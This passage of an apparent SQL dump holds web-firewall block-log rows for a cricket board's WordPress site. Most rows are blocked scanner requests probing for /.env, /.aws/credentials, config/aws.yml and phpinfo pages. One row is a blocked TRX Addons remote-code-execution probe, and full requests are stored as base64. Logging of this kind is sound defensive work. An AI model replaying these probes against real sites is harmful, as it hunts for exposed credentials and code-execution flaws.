User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnY=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uZW52IEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(900,1630065425.894113,1630065425.813900,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/config.js',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy5qcw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcuanMgSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(901,1630065423.942508,1630065423.867500,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(902,1630065421.939938,1630065421.864700,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcvYXdzLnltbCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(903,1630065419.545849,1630065419.444500,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(904,1630065417.593761,1630065417.477400,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uYXdzL2NyZWRlbnRpYWxzIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(905,1630065415.489891,1630065415.412000,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9pbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(906,1630065413.337267,1630065413.244300,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uZW52LmJhayBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(907,1630065411.089145,1630065410.975000,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9hd3MueW1sIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(908,1630065408.421939,1630065408.342600,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(909,1630065406.284876,1630065405.731000,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(910,1630065403.880025,1630065403.787800,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9fcHJvZmlsZXIvcGhwaW5mbyBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(911,1630428713.281359,1630428713.092700,'\0\0\0\0\0\0\0\0\0\0��N.��',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/wp-json/trx_addons/v2/get/sc_layout?sc=print_r',NULL,'Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)','blocked:waf','TRX Addons >= 1.6.50 - Remote Code Execution','{\"learningMode\":0,\"failedRules\":\"209\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"path\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1qc29uL3RyeF9hZGRvbnMvdjIvZ2V0L3NjX2xheW91dD9zYz1wcmludF9yIEhUVFAvMS4xClgtUmVxdWVzdGVkLVdpdGg6IFhNTEh0dHBSZXF1ZXN0CkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjUKVXNlci1BZ2VudDogQXBhY2hlLzIuNC4zNCAoVWJ1bnR1KSBPcGVuU1NMLzEuMS4xIChpbnRlcm5hbCBkdW1teSBjb25uZWN0aW9uKQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjogY2xvc2UKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZDsgY2hhcnNldD1VVEYtOAoK\"}'),(912,1630536240.030409,1630536239.910900,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/config.js',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 